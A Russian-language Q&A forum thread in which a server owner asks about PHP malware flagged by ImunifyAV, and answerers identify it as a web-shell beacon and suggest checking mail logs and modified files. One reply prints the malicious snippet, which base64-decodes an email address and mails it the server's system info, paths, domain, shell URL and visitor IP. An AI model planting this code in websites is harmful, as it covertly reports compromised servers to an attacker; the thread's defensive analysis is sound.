good_br
@good_br
учусь

Что это за вирус, на что он направлен?

Здравствуйте! Недавно возникли проблемы с сервером (резкие скачки нагрузки после которых сервер вис), я написал в тех.поддержку, мне сообщили, что это вирус по данным сканирования ImunifyAV, но правильно ли он определил это и на что направлен этот вирус?
Код PHP на облаке
Яндекс диск
  • Вопрос задан
  • 1274 просмотра
Решения вопроса 2
@granty
Этот кусок php-кода посылает на емайл portovjack@gmail.com (он закодирован в "cG9ydG92amFja0BnbWFpbC5jb20=") сообщение об успешной установке шелла на сайте.

Как видно из сообщения $body, сам PHP-шелл находится в модуле http:// $web$path, ищите это письмо в логах почтового сервера, оно было отправлено через почтовик хостера.
Или смотрите последние даты изменения php-файлов движка сайта - сам шелл там.
Ответ написан
Комментировать
DevMan
@DevMan
$web = $_SERVER["HTTP_HOST"];
$path = $_SERVER["REQUEST_URI"];
$ip = $_SERVER["REMOTE_ADDR"];
$contact = base64_decode("cG9ydG92amFja0BnbWFpbC5jb20=");
$body = "\nUname: ".php_uname()."\nPath Dir: ".$cwd = getcwd()."\nMessage:\n"."\nE-Path: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-Domain: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\nShell: http://$web$path\n\nIP: $ip";
mail("$contact","Result Shell in [http://$web]", "$body");
классический шел. как минимум.
Ответ написан
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы